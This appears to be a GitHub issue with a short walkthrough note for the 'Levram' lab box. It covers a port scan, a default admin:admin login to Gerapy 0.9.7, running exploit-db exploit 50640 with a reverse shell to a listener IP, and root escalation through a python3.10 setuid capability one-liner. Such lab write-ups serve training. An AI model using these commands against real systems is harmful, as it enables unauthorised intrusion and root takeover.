search

WDavid404 / PG-Box

PG box workthough note
0 stars 0 forks source link

Levram (easy) #25

Open WDavid404 opened 1 month ago

WDavid404 commented 1 month ago

Keypoints:

WDavid404 commented 1 month ago 
PORT     STATE SERVICE  REASON         VERSION
22/tcp   open  ssh      syn-ack ttl 61 OpenSSH 8.9p1 Ubuntu 3 (Ubuntu Linux; protocol 2.0)
8000/tcp open  http-alt syn-ack ttl 61 WSGIServer/0.2 CPython/3.10.6
|_http-cors: GET POST PUT DELETE OPTIONS PATCH
|_http-server-header: WSGIServer/0.2 CPython/3.10.6
| http-methods: 
|_  Supported Methods: OPTIONS GET
|_http-title: Gerapy

http://192.168.207.24:8000 -->Can login with admin:admin --> Gerapy v0.9.7 image

Search Gerapy v0.9.7 exploit --> https://www.exploit-db.com/exploits/50640

In order to use this exploit py file, need to create a new project then, run python3 50640.py -t 192.168.207.24 -p 8000 -L 192.168.45.180 -P 80

Got a reverse shell from the target host image

PE:

linpeas: /usr/bin/python3.10 cap_setuid=ep image According to GTFOBINS /usr/bin/python3.10 -c 'import os; os.setuid(0); os.system("/bin/sh")' image